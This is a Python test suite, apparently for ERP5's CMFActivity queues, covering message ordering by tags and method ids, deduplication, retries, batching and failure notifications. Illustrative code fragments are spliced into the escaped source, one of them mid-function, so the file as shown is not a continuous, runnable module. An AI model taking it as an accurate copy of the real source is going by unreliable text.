result_dict[2]\n    self.assertEqual(result_dict[2].method_id, 'getTitle')\n    self.assertEqual(result.result , self.title1)\n    result = result_dict[3]\n    self.assertEqual(result_dict[3].method_id, 'getTitle')\n    self.assertEqual(result.result , self.title1)\n    # Execute any further activity which may have been spawned by activity\n    # execution (ex: fulltext indexation of the active process).\n    self.tic()\n\n  @for_each_activity\n  def testTryMethodAfterMethod(self, activity):\n    \"\"\"\n    Ensure the order of execution by a method id\n    \"\"\"\n    o = self.getOrganisation()\n\n    o.setTitle('a')\n    self.assertEqual(o.getTitle(), 'a')\n    self.tic()\n\n    def toto(self, value):\n      self.setTitle(self.getTitle() + value)\n    o.__class__.toto = toto\n\n    def titi(self, value):\n      self.setTitle(self.getTitle() + value)\n    o.__class__.titi = titi\n\n    o.activate(after_method_id = 'titi', activity = activity).toto('b')\n    o.activate(activity = activity).titi('c')\n    self.tic()\n    self.assertEqual(o.getTitle(), 'acb')\n\n  @for_each_activity\n  def testTryAfterTag(self, activity):\n    \"\"\"\n    Ensure the order of execution by a tag\n    \"\"\"\n    o = self.getOrganisation()\n\n    o.setTitle('?')\n    self.assertEqual(o.getTitle(), '?')\n    self.tic()\n\n    
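TryActiveProcess and TryActiveProcessWithResultDict above rely on an Active Process to collect results: each activated call may carry a signature, and getResultDict() later maps signature to result. A plain-dict stand-in for that collection pattern (ToyActiveProcess is an invented name, not the real ActiveProcess class):

class ToyActiveProcess(object):
    def __init__(self):
        self._results = {}
    def postResult(self, signature, method_id, result):
        # The real implementation stores persistent result objects;
        # a (method_id, result) tuple is enough for the illustration.
        self._results[signature] = (method_id, result)
    def getResultDict(self):
        return dict(self._results)

process = ToyActiveProcess()
for signature in (1, 2, 3):
    process.postResult(signature, 'getTitle', 'title1')
assert process.getResultDict()[2] == ('getTitle', 'title1')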
o.activate(after_tag = 'toto', activity = activity).setTitle('b')\n o.activate(tag = 'toto', activity = activity).setTitle('a')\n self.tic()\n self.assertEqual(o.getTitle(), 'b')\n\n o.setDefaultActivateParameterDict({'tag': 'toto'})\n def titi(self):\n self.setCorporateName(self.getTitle() + 'd')\n o.__class__.titi = titi\n o.activate(after_tag_and_method_id=('toto', 'setTitle'), activity = activity).titi()\n o.activate(activity = activity).setTitle('c')\n self.tic()\n self.assertEqual(o.getCorporateName(), 'cd')\n\n @for_each_activity\n def testTryFlushActivityWithAfterTag(self, activity):\n \"\"\"\n Ensure the order of an execution by a tag\n \"\"\"\n o = self.getOrganisation()\n\n o.setTitle('?')\n o.setDescription('?')\n self.assertEqual(o.getTitle(), '?')\n self.assertEqual(o.getDescription(), '?')\n self.tic()\n\n o.activate(after_tag = 'toto', activity = activity).setDescription('b')\n o.activate(tag = 'toto', activity = activity).setTitle('a')\n self.commit()\n tool = self.getActivityTool()\n self.assertRaises(ActivityFlushError,tool.manageInvoke,o.getPath(),'setDescription')\n tool.manageInvoke(o.getPath(),'setTitle')\n self.commit()\n self.assertEqual(o.getTitle(), 'a')\n self.assertEqual(o.getDescription(), '?')\n self.tic()\n self.assertEqual(o.getTitle(), 'a')\n self.assertEqual(o.getDescription(), 'b')\n\n @for_each_activity\n def testScheduling(self, activity):\n \"\"\"\n Check if active objects with different after parameters are executed in a correct order\n \"\"\"\n o = self.getOrganisation()\n\n o.setTitle('?')\n self.assertEqual(o.getTitle(), '?')\n self.tic()\n\n def toto(self, s):\n self.setTitle(self.getTitle() + s)\n o.__class__.toto = toto\n\n o.activate(tag = 'toto', activity = activity).toto('a')\n self.commit()\n o.activate(after_tag = 'titi', activity = activity).toto('b')\n self.commit()\n o.activate(tag = 'titi', after_tag = 'toto', activity = activity).setTitle('c')\n self.tic()\n self.assertEqual(o.getTitle(), 'cb')\n\n @for_each_activity\n def testSchedulingAfterTagList(self, activity):\n \"\"\"\n Check if active objects with different after parameters are executed in a\n correct order, when after_tag is passed as a list\n \"\"\"\n o = self.getOrganisation()\n\n o.setTitle('')\n self.tic()\n\n def toto(self, s):\n self.setTitle(self.getTitle() + s)\n o.__class__.toto = toto\n\n o.activate(tag='A', activity=activity).toto('a')\n self.commit()\n o.activate(tag='B', activity=activity).toto('b')\n self.commit()\n o.activate(after_tag=('A', 'B'), activity=activity).setTitle('last')\n self.tic()\n self.assertEqual(o.getTitle(), 'last')\n\n @for_each_activity\n def testCheckCountMessageWithTag(self, activity):\n \"\"\"\n Check countMessageWithTag function.\n \"\"\"\n activity_tool = self.portal.portal_activities\n o = self.getOrganisation()\n o.setTitle('?')\n self.tic()\n\n o.activate(tag = 'toto', activity = activity).setTitle('a')\n self.commit()\n self.assertEqual(o.getTitle(), '?')\n self.assertEqual(activity_tool.countMessageWithTag('toto'), 1)\n self.tic()\n self.assertEqual(o.getTitle(), 'a')\n self.assertEqual(activity_tool.countMessageWithTag('toto'), 0)\n\n def testTryErrorsWhileFinishingCommitDB(self):\n \"\"\"Try to execute active objects which may throw conflict errors\n while validating, and check if they are still executed.\"\"\"\n activity_tool = self.portal.portal_activities\n\n # Monkey patch Queue to induce conflict errors artificially.\n def query(self, query_string,*args, **kw):\n # Not so nice, this is specific to zsql method\n if 
\"REPLACE INTO\" in query_string:\n raise OperationalError\n return self.original_query(query_string,*args, **kw)\n\n # Test some range of conflict error occurences.\n self.portal.organisation_module.reindexObject()\n self.commit()\n message, = activity_tool.getMessageList()\n try:\n DB.original_query = DB.query\n DB.query = query\n activity_tool.distribute()\n activity_tool.tic()\n self.commit()\n finally:\n DB.query = DB.original_query\n del DB.original_query\n self.deleteMessageList('SQLDict', [message])\n\n @for_each_activity\n def testIsMessageRegisteredMethod(self, activity):\n dedup = activity != 'SQLQueue'\n activity_tool = self.portal.portal_activities\n object_b = self.getOrganisation()\n object_a = object_b.getParentValue()\n def check(count):\n self.commit()\n self.assertEqual(len(activity_tool.getMessageList()), count)\n self.tic()\n # First case: creating the same activity twice must only register one\n # for queues with deduplication.\n object_a.activate(activity=activity).getId()\n object_a.activate(activity=activity).getId()\n check(1 if dedup else 2)\n # Second case: creating activity with same tag must only register one,\n # for queues with deduplication.\n # This behaviour is actually the same as the no-tag behaviour.\n object_a.activate(activity=activity, tag='foo').getId()\n object_a.activate(activity=activity, tag='foo').getId()\n check(1 if dedup else 2)\n # Third case: creating activities with different tags must register both.\n object_a.activate(activity=activity, tag='foo').getId()\n object_a.activate(activity=activity, tag='bar').getId()\n check(2)\n # Fourth case: creating activities on different objects must register\n # both.\n object_a.activate(activity=activity).getId()\n object_b.activate(activity=activity).getId()\n check(2)\n # Fifth case: creating activities with different method must register\n # both.\n object_a.activate(activity=activity).getId()\n object_a.activate(activity=activity).getTitle()\n check(2)\n\n def test_33_TryActivateFlushActivateTicWithSQLDict(self):\n # Test if we call methods only once\n self.TryActivateFlushActivateTic('SQLDict')\n\n def test_34_TryActivateFlushActivateTicWithSQLQueue(self):\n # Test if we call methods only once\n self.TryActivateFlushActivateTic('SQLQueue')\n\n def test_37_TryActivateFlushActivateTicWithMultipleActivities(self):\n # Test if we call methods only once\n self.TryActivateFlushActivateTic('SQLQueue',second='SQLDict')\n self.TryActivateFlushActivateTic('SQLDict',second='SQLQueue')\n\n def test_38_TryCommitSubTransactionWithSQLDict(self):\n # Test if we call methods only once\n self.TryActivateFlushActivateTic('SQLDict',commit_sub=1)\n\n def test_39_TryCommitSubTransactionWithSQLQueue(self):\n # Test if we call methods only once\n self.TryActivateFlushActivateTic('SQLQueue',commit_sub=1)\n\n def test_46_TryActiveProcessWithSQLDict(self):\n # Test if we call methods only once\n self.TryActiveProcess('SQLDict')\n\n def test_47_TryActiveProcessWithSQLQueue(self):\n # Test if we call methods only once\n self.TryActiveProcess('SQLQueue')\n\n def test_48_TryActiveProcessWithSQLJoblib(self):\n # Test if we call methods only once\n self.TryActiveProcessWithResultDict('SQLJoblib')\n\n def test_57_TryCallActivityWithRightUser(self):\n # Test if me execute methods with the right user\n # This should be independant of the activity used\n # We are first logged as seb\n activity_tool = self.portal.portal_activities\n organisation = self.getOrganisation()\n # Add new user toto\n uf = self.portal.acl_users\n 
uf._doAddUser('toto', '', ['Manager'], [])\n user = uf.getUserById('toto').__of__(uf)\n newSecurityManager(None, user)\n # Execute something as toto\n organisation.activate().newContent(portal_type='Email',id='email')\n # Then execute activities as seb\n user = uf.getUserById('seb').__of__(uf)\n newSecurityManager(None, user)\n self.tic()\n email = organisation.get('email')\n # Check if what we did was executed as toto\n self.assertEqual(email.getOwnerInfo()['id'],'toto')\n\n def flushAllActivities(self, silent=0, loop_size=1000):\n \"\"\"Executes all messages until the queue only contains failed\n messages.\n \"\"\"\n activity_tool = self.portal.portal_activities\n for _ in xrange(loop_size):\n activity_tool.distribute(node_count=1)\n activity_tool.tic(processing_node=1)\n\n finished = all(message.processing_node == INVOKE_ERROR_STATE\n for message in activity_tool.getMessageList())\n\n activity_tool.timeShift(3 * VALIDATION_ERROR_DELAY)\n self.commit()\n if finished:\n return\n if not silent:\n self.fail('flushAllActivities maximum loop count reached')\n\n def test_68_TestMessageValidationAndFailedActivities(self):\n \"\"\"after_method_id and failed activities.\n\n Tests that if we have an active method scheduled by\n after_method_id and a failed activity with this method id, the\n method is NOT executed.\n\n Note: earlier version of this test checked exactly the contrary, but it\n was eventually agreed that this was a bug. If an activity fails, all the\n activities that depend on it should be block until the first one is\n resolved.\"\"\"\n activity_tool = self.portal.portal_activities\n original_title = 'something'\n obj = self.portal.organisation_module.newContent(\n portal_type='Organisation',\n title=original_title)\n # Monkey patch Organisation to add a failing method\n def failingMethod(self):\n raise ValueError('This method always fail')\n Organisation.failingMethod = failingMethod\n\n for activity in ActivityTool.activity_dict:\n # reset\n activity_tool.manageClearActivities()\n obj.setTitle(original_title)\n self.commit()\n\n # activate failing message and flush\n for fail_activity in ActivityTool.activity_dict:\n obj.activate(activity = fail_activity).failingMethod()\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n full_message_list = activity_tool.getMessageList()\n remaining_messages = [a for a in full_message_list if a.method_id !=\n 'failingMethod']\n if len(full_message_list) != 3:\n self.fail('failingMethod should not have been flushed')\n if len(remaining_messages) != 0:\n self.fail('Activity tool should have no other remaining messages')\n\n # activate our message\n new_title = 'nothing'\n obj.activate(after_method_id = ['failingMethod'],\n activity = activity ).setTitle(new_title)\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n full_message_list = activity_tool.getMessageList()\n remaining_messages = [a for a in full_message_list if a.method_id !=\n 'failingMethod']\n self.assertEqual(len(full_message_list), 4,\n 'failingMethod should not have been flushed')\n self.assertEqual(len(remaining_messages), 1,\n 'Activity tool should have one blocked setTitle activity')\n self.assertEqual(remaining_messages[0].activity_kw['after_method_id'],\n ['failingMethod'])\n self.assertEqual(obj.getTitle(), original_title)\n\n activity_tool.manageClearActivities()\n self.commit()\n\n def test_70_TestCancelFailedActiveObject(self):\n \"\"\"Cancel an active object to make sure that it does not refer to\n a persistent object.\n \"\"\"\n 
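test_68 above pins down the after_method_id rule: a message stays blocked while any message with one of the named method ids is still queued, including frozen (failed) ones. Expressed as a predicate over a toy in-memory queue (runnable() and the dict layout are illustrative, not the SQL schema):

queue = [
    {'method_id': 'failingMethod', 'frozen': True},
    {'method_id': 'setTitle', 'after_method_id': ['failingMethod']},
]

def runnable(message, queue):
    waiting_for = message.get('after_method_id', [])
    return not any(other['method_id'] in waiting_for
                   for other in queue if other is not message)

assert not runnable(queue[1], queue)  # setTitle waits, even on a frozen blocker
assert runnable(queue[0], queue)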
activity_tool = self.portal.portal_activities\n\n original_title = 'something'\n obj = self.portal.organisation_module.newContent(\n portal_type='Organisation',\n title=original_title)\n\n # Monkey patch Organisation to add a failing method\n def failingMethod(self):\n raise ValueError('This method always fail')\n Organisation.failingMethod = failingMethod\n\n # First, index the object.\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n self.assertEqual(len(activity_tool.getMessageList()), 0)\n\n # Insert a failing active object.\n obj.activate().failingMethod()\n self.commit()\n self.assertEqual(len(activity_tool.getMessageList()), 1)\n\n # Just wait for the active object to be abandoned.\n self.flushAllActivities(silent=1, loop_size=100)\n self.assertEqual(len(activity_tool.getMessageList()), 1)\n self.assertEqual(activity_tool.getMessageList()[0].processing_node,\n INVOKE_ERROR_STATE)\n\n # Make sure that persistent objects are not present in the connection\n # cache to emulate a restart of Zope. So all volatile attributes will\n # be flushed, and persistent objects will be reloaded.\n activity_tool._p_jar._resetCache()\n\n # Cancel it via the management interface.\n message = activity_tool.getMessageList()[0]\n activity_tool.manageCancel(message.object_path, message.method_id)\n self.commit()\n\n def test_71_RetryMessageExecution(self):\n activity_tool = self.portal.portal_activities\n exec_count = [0]\n # priority does not matter anymore\n priority = random.Random().randint\n def doSomething(self, retry_list):\n i = exec_count[0]\n exec_count[0] = i + 1\n conflict, edit_kw = retry_list[i]\n if edit_kw:\n self.getActivityRuntimeEnvironment().edit(**edit_kw)\n if conflict is not None:\n raise ConflictError if conflict else Exception\n def check(retry_list, **activate_kw):\n fail = retry_list[-1][0] is not None and 1 or 0\n for activity in ActivityTool.activity_dict:\n exec_count[0] = 0\n activity_tool.activate(activity=activity, priority=priority(1,6),\n **activate_kw).doSomething(retry_list)\n self.commit()\n self.flushAllActivities(silent=1)\n self.assertEqual(len(retry_list), exec_count[0])\n self.assertEqual(fail, len(activity_tool.getMessageList()))\n activity_tool.manageCancel(\n activity_tool.getPhysicalPath(), 'doSomething')\n self.commit()\n activity_tool.__class__.doSomething = doSomething\n try:\n ## Default behaviour\n # Usual successful case: activity is run only once\n check([(None, None)])\n # Usual error case: activity is run 6 times before being frozen\n check([(False, None)] * 6)\n # On ConflictError, activity is reexecuted without increasing retry count\n check([(True, None)] * 10 + [(None, None)])\n check([(True, None), (False, None)] * 6)\n ## Customized behaviour\n # Do not retry\n check([(False, {'max_retry': 0})])\n # ... 
even in case of ConflictError\n check([(True, {'max_retry': 0}),\n (True, {'max_retry': 0, 'conflict_retry': 0})])\n check([(True, None)] * 6, conflict_retry=False)\n # Customized number of retries\n for n in 3, 9:\n check([(False, {'max_retry': n})] * n + [(None, None)])\n check([(False, {'max_retry': n})] * (n + 1))\n # Infinite retry\n for n in 3, 9:\n check([(False, {'max_retry': None})] * n + [(None, None)])\n check([(False, {'max_retry': None})] * n + [(False, {'max_retry': 0})])\n check([(False, {'max_retry': None})] * 9 + [(False, None)])\n\n finally:\n del activity_tool.__class__.doSomething\n\n def test_79_ActivateKwForNewContent(self):\n o1 = self.getOrganisationModule().newContent(\n activate_kw=dict(tag='The Tag'))\n self.commit()\n m, = self.getActivityTool().getMessageList(path=o1.getPath())\n self.assertEqual(m.activity_kw.get('tag'), 'The Tag')\n self.tic()\n\n def test_80_FlushAfterMultipleActivate(self):\n orga_module = self.getOrganisationModule()\n p = orga_module.newContent(portal_type='Organisation')\n self.tic()\n self.assertEqual(p.getDescription(), \"\")\n activity_tool = self.portal.portal_activities\n\n def updateDesc(self):\n d =self.getDescription()\n self.setDescription(d+'a')\n Organisation.updateDesc = updateDesc\n\n # First check dequeue read same message only once\n for i in xrange(10):\n p.activate(activity=\"SQLDict\").updateDesc()\n self.commit()\n\n self.assertEqual(len(activity_tool.getMessageList()), 10)\n self.tic()\n self.assertEqual(p.getDescription(), \"a\")\n\n # Check if there is pending activity after deleting an object\n for i in xrange(10):\n p.activate(activity=\"SQLDict\").updateDesc()\n self.commit()\n\n self.assertEqual(len(activity_tool.getMessageList()), 10)\n activity_tool.flush(p, invoke=0)\n self.commit()\n\n @for_each_activity\n def testCallWithGroupIdParamater(self, activity):\n dedup = activity != 'SQLQueue'\n activity_tool = self.portal.portal_activities\n organisation = self.getOrganisation()\n # Defined a group method\n foobar_list = []\n def setFoobar(self, object_list):\n foobar_list.append(len(object_list))\n for m in object_list:\n obj = m.object\n obj.foobar += m.kw.get('number', 1)\n m.result = None\n from Products.ERP5Type.Core.Folder import Folder\n Folder.setFoobar = setFoobar\n\n Organisation.getFoobar = lambda self: self.foobar\n\n organisation.foobar = 0\n self.assertEqual(0,organisation.getFoobar())\n\n # Test group_method_id is working without group_id\n for x in xrange(5):\n organisation.activate(activity=activity, group_method_id=\"organisation_module/setFoobar\").reindexObject(number=1)\n self.commit()\n\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),5)\n activity_tool.tic()\n expected = 1 if dedup else 5\n self.assertEqual(expected, organisation.getFoobar())\n\n\n # Test group_method_id is working with one group_id defined\n for x in xrange(5):\n organisation.activate(activity=activity, group_method_id=\"organisation_module/setFoobar\", group_id=\"1\").reindexObject(number=1)\n self.commit()\n\n message_list = activity_tool.getMessageList()\n self.assertEqual(len(message_list),5)\n activity_tool.tic()\n self.assertEqual(expected * 2, organisation.getFoobar())\n\n self.assertEqual([expected, expected], foobar_list)\n del foobar_list[:]\n\n # Test group_method_id is working with many group_id defined\n for x in xrange(5):\n organisation.activate(activity=activity, group_method_id=\"organisation_module/setFoobar\", group_id=\"1\").reindexObject(number=1)\n self.commit()\n 
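test_71 above fixes the retry contract: an ordinary exception consumes one retry until max_retry is exceeded (the message is then frozen in INVOKE_ERROR_STATE), while a ConflictError causes re-execution without touching the retry count. A compact model of that loop (ConflictError here is a local stand-in for ZODB.POSException.ConflictError):

class ConflictError(Exception):
    pass  # stand-in for ZODB.POSException.ConflictError

def process(message, max_retry=5):
    retry = 0
    while True:
        try:
            return message()
        except ConflictError:
            continue            # conflicts never consume a retry
        except Exception:
            if retry >= max_retry:
                raise           # would freeze as INVOKE_ERROR_STATE
            retry += 1

attempts = []
def flaky():
    attempts.append(None)
    if len(attempts) < 4:
        raise ConflictError     # three conflicts: retry count stays 0
    if len(attempts) < 6:
        raise ValueError        # two real failures: retries 1 and 2
    return 'done'

assert process(flaky) == 'done'
assert len(attempts) == 6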
organisation.activate(activity=activity, group_method_id=\"organisation_module/setFoobar\", group_id=\"2\").reindexObject(number=3)\n      self.commit()\n      organisation.activate(activity=activity, group_method_id=\"organisation_module/setFoobar\", group_id=\"1\").reindexObject(number=1)\n      self.commit()\n      organisation.activate(activity=activity, group_method_id=\"organisation_module/setFoobar\", group_id=\"3\").reindexObject(number=5)\n      self.commit()\n\n    message_list = activity_tool.getMessageList()\n    self.assertEqual(len(message_list),20)\n    activity_tool.tic()\n    self.assertEqual(11 if dedup else 60,\n                     organisation.getFoobar())\n    self.assertEqual([1, 1, 1] if dedup else [5, 5, 10],\n                     sorted(foobar_list))\n\n  def test_84_ActivateKwForWorkflowTransition(self):\n    \"\"\"\n    Test that calling a workflow transition with an activate_kw parameter propagates it\n    \"\"\"\n    o1 = self.getOrganisationModule().newContent()\n    self.tic()\n    o1.validate(activate_kw=dict(tag='The Tag'))\n    self.commit()\n    m, = self.getActivityTool().getMessageList(path=o1.getPath())\n    self.assertEqual(m.activity_kw.get('tag'), 'The Tag')\n    self.tic()\n\n  def test_85_LossOfVolatileAttribute(self):\n    \"\"\"\n    Test that the loss of volatile attributes doesn't lose activities\n    \"\"\"\n    activity_tool = self.getActivityTool()\n    def delete_volatiles():\n      for property_id in activity_tool.__dict__.keys():\n        if property_id.startswith('_v_'):\n          delattr(activity_tool, property_id)\n    organisation_module = self.getOrganisationModule()\n    active_organisation_module = organisation_module.activate()\n    delete_volatiles()\n    # Cause a message to be created\n    # If the buffer cannot be created, this will raise\n    active_organisation_module.getTitle()\n    delete_volatiles()\n    # Another activity to check that first one did not get lost even if volatile disappears\n    active_organisation_module.getId()\n    self.commit()\n    message_list = activity_tool.getMessageList()\n    self.assertEqual(len(message_list), 2)\n    self.tic()\n\n  def test_88_ProcessingMultipleMessagesMustRevertIndividualMessagesOnError(self):\n    \"\"\"\n    Check that, on queues which support it, processing a batch of multiple\n    messages doesn't cause failed ones to be committed along with successful\n    ones.\n\n    Queues supporting message batch processing:\n    - SQLQueue\n    \"\"\"\n    activity_tool = self.getActivityTool()\n    obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n    active_obj = obj.activate(activity='SQLQueue')\n    def appendToTitle(self, to_append, fail=False):\n      self.setTitle(self.getTitle() + to_append)\n      if fail:\n        raise ValueError('This method always fail')\n    try:\n      Organisation.appendToTitle = appendToTitle\n      obj.setTitle('a')\n      active_obj.appendToTitle('b')\n      active_obj.appendToTitle('c', fail=True)\n      active_obj.appendToTitle('d')\n      object_id = obj.getId()\n      self.commit()\n      self.assertEqual(obj.getTitle(), 'a')\n      self.assertEqual(activity_tool.countMessage(method_id='appendToTitle'), 3)\n      self.flushAllActivities(silent=1, loop_size=100)\n      self.assertEqual(sorted(obj.getTitle()), ['a', 'b', 'd'])\n      message, = self.getMessageList('SQLQueue', method_id='appendToTitle')\n      self.deleteMessageList('SQLQueue', [message])\n    finally:\n      del Organisation.appendToTitle\n\n  def test_89_RequestIsolationInsideSameTic(self):\n    \"\"\"\n    Check that request information does not leak from one activity to another\n    inside the same TIC invocation.\n    This only applies to queues supporting batch processing:\n    - SQLQueue\n    \"\"\"\n    obj = self.portal.organisation_module.newContent(portal_type='Organisation', 
title='Pending')\n marker_id = 'marker_%i' % (random.randint(1, 10), )\n def putMarkerValue(self, marker_id):\n self.REQUEST.set(marker_id, 1)\n def checkMarkerValue(self, marker_id):\n if self.REQUEST.get(marker_id) is not None:\n self.setTitle('Failed')\n else:\n self.setTitle('Success')\n try:\n Organisation.putMarkerValue = putMarkerValue\n Organisation.checkMarkerValue = checkMarkerValue\n obj.activate(activity='SQLQueue', tag='set_first').putMarkerValue(marker_id=marker_id)\n obj.activate(activity='SQLQueue', after_tag='set_first').checkMarkerValue(marker_id=marker_id)\n self.assertEqual(obj.getTitle(), 'Pending')\n self.tic()\n self.assertEqual(obj.getTitle(), 'Success')\n finally:\n del Organisation.putMarkerValue\n del Organisation.checkMarkerValue\n\n def test_globalrequest(self):\n \"\"\"zope.globalrequest.getRequest (also known as Products.Global.get_request)\n should be same as app.REQUEST, also when executing activities.\n \"\"\"\n from zope.globalrequest import getRequest\n get_request_before = getRequest()\n def checkRequest(active_self):\n self.assertIs(getRequest(), active_self.REQUEST)\n\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n Organisation.checkRequest = checkRequest\n try:\n obj.activate(activity='SQLQueue').checkRequest()\n obj.activate(activity='SQLDict').checkRequest()\n self.tic()\n finally:\n del Organisation.checkRequest\n self.assertIs(getRequest(), get_request_before)\n\n @for_each_activity\n def testTryUserNotificationOnActivityFailure(self, activity):\n message_list = self.portal.MailHost._message_list\n del message_list[:]\n portal_activities = self.portal.portal_activities\n countMessage = portal_activities.countMessage\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n def failingMethod(self): raise ValueError('This method always fails')\n Organisation.failingMethod = failingMethod\n try:\n portal_activities.activity_failure_mail_notification = True\n # MESSAGE_NOT_EXECUTED\n obj.activate(activity=activity).failingMethod()\n self.commit()\n self.assertFalse(message_list)\n self.flushAllActivities(silent=1, loop_size=100)\n # Check there is a traceback in the email notification\n sender, recipients, mail = message_list.pop()\n self.assertIn(\"Module %s, line %s, in failingMethod\" % (\n __name__, inspect.getsourcelines(failingMethod)[1]), mail)\n self.assertIn(\"ValueError:\", mail)\n portal_activities.manageClearActivities()\n # MESSAGE_NOT_EXECUTABLE\n obj_path = obj.getPath()\n obj.activate(activity=activity).failingMethod()\n self.commit()\n obj.getParentValue()._delObject(obj.getId())\n self.commit()\n self.assertGreater(countMessage(path=obj_path), 0)\n self.tic()\n self.assertEqual(countMessage(path=obj_path), 0)\n self.assertFalse(message_list)\n finally:\n self.portal.portal_activities.activity_failure_mail_notification = True\n del Organisation.failingMethod\n\n @for_each_activity\n def testTryUserNotificationDisabledOnActivityFailure(self, activity):\n message_list = self.portal.MailHost._message_list\n del message_list[:]\n portal_activities = self.portal.portal_activities\n countMessage = portal_activities.countMessage\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n def failingMethod(self): raise ValueError('This method always fails')\n Organisation.failingMethod = failingMethod\n try:\n portal_activities.activity_failure_mail_notification = False\n # MESSAGE_NOT_EXECUTED\n 
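The group_method_id tests above show the batching contract: instead of one call per message, the queue makes a single call to the group method with the whole batch, and each message records its own result. Reduced to plain Python (Msg and the dict-based document are invented stand-ins for the real Message and Organisation objects):

class Msg(object):
    def __init__(self, obj, **kw):
        self.object, self.kw, self.result = obj, kw, None

def setFoobar(object_list):
    # One call for the whole batch, like the group method above.
    for m in object_list:
        m.object['foobar'] += m.kw.get('number', 1)
        m.result = None

document = {'foobar': 0}
setFoobar([Msg(document, number=1), Msg(document, number=3)])
assert document['foobar'] == 4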
obj.activate(activity=activity).failingMethod()\n self.commit()\n self.assertFalse(message_list)\n self.flushAllActivities(silent=1, loop_size=100)\n # Check there is a traceback in the email notification\n self.assertFalse(message_list)\n portal_activities.manageClearActivities()\n # MESSAGE_NOT_EXECUTABLE\n obj_path = obj.getPath()\n obj.activate(activity=activity).failingMethod()\n self.commit()\n obj.getParentValue()._delObject(obj.getId())\n self.commit()\n self.assertGreater(countMessage(path=obj_path), 0)\n self.tic()\n self.assertEqual(countMessage(path=obj_path), 0)\n self.assertFalse(message_list)\n finally:\n portal_activities.activity_failure_mail_notification = True\n del Organisation.failingMethod\n\n def test_93_tryUserNotificationRaise(self):\n activity_tool = self.portal.portal_activities\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n original_notifyUser = Message.notifyUser\n def failingMethod(self, *args, **kw):\n raise ValueError('This method always fail')\n Message.notifyUser = failingMethod\n Organisation.failingMethod = failingMethod\n try:\n for activity in ActivityTool.activity_dict:\n obj.activate(activity=activity, priority=6).failingMethod()\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n message, = activity_tool.getMessageList(\n activity=activity, method_id='failingMethod')\n self.assertEqual(message.processing_node, INVOKE_ERROR_STATE)\n self.assertTrue(message.retry)\n activity_tool.manageDelete(message.uid, activity)\n self.commit()\n finally:\n Message.notifyUser = original_notifyUser\n del Organisation.failingMethod\n\n @for_each_activity\n def testTryActivityRaiseInCommitDoesNotStallActivityConection(self, activity):\n \"\"\"\n Check that an activity which commit raises (as would a regular conflict\n error be raised in tpc_vote) does not cause activity connection to\n stall.\n \"\"\"\n try:\n Organisation.registerFailingTransactionManager = registerFailingTransactionManager\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n now = DateTime()\n obj.activate(activity=activity).registerFailingTransactionManager()\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n self.commit()\n # Check that cmf_activity SQL connection still works\n connection_da = self.portal.cmf_activity_sql_connection()\n self.assertFalse(connection_da._registered)\n connection_da.query('select 1')\n self.assertTrue(connection_da._registered)\n self.commit()\n self.assertFalse(connection_da._registered)\n message, = self.getMessageList(activity)\n self.deleteMessageList(activity, [message])\n finally:\n del Organisation.registerFailingTransactionManager\n\n @for_each_activity\n def testTryActivityRaiseInCommitDoesNotLoseMessages(self, activity):\n \"\"\"\n \"\"\"\n try:\n Organisation.registerFailingTransactionManager = registerFailingTransactionManager\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n now = DateTime()\n obj.activate(activity=activity).registerFailingTransactionManager()\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n self.commit()\n message, = self.getMessageList(activity,\n method_id='registerFailingTransactionManager')\n self.deleteMessageList(activity, [message])\n finally:\n del Organisation.registerFailingTransactionManager\n\n @for_each_activity\n def testTryChangeSkinInActivity(self, activity):\n activity_tool = self.getActivityTool()\n def changeSkinToNone(self):\n 
self.getPortalObject().changeSkin(None)\n Organisation.changeSkinToNone = changeSkinToNone\n try:\n organisation = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n organisation.activate(activity=activity).changeSkinToNone()\n self.commit()\n self.assertEqual(len(activity_tool.getMessageList()), 1)\n self.flushAllActivities(silent=1, loop_size=100)\n finally:\n del Organisation.changeSkinToNone\n\n @for_each_activity\n def testDeduplicatingQueuesDoNotDeleteSimilaritiesBeforeExecution(self,\n activity):\n \"\"\"\n Test that SQLDict does not delete similar messages which have the same\n method_id and path but a different tag before execution.\n \"\"\"\n if activity == 'SQLQueue':\n return\n activity_tool = self.getActivityTool()\n marker = []\n def doSomething(self, other_tag):\n marker.append(self.countMessage(tag=other_tag))\n activity_tool.__class__.doSomething = doSomething\n try:\n # Adds two similar but not the same activities.\n activity_tool.activate(activity=activity, after_tag='foo',\n tag='a').doSomething(other_tag='b')\n activity_tool.activate(activity=activity, after_tag='bar',\n tag='b').doSomething(other_tag='a')\n self.commit()\n activity_tool.tic() # make sure distribution phase was not skipped\n activity_tool.distribute()\n # after distribute, similarities are still there.\n self.assertEqual(len(self.getMessageList(activity)), 2)\n activity_tool.tic()\n self.assertEqual(marker, [1])\n finally:\n del activity_tool.__class__.doSomething\n\n @for_each_activity\n def testDeduplicatingQueuesDoNotDeleteDuplicatesBeforeExecution(self,\n activity):\n \"\"\"\n Test that SQLDict does not delete messages before execution\n even if messages have the same method_id and path and tag.\n There could be other things which differ (ex: serialization_tag) and may\n not all be cheap to check during validation. 
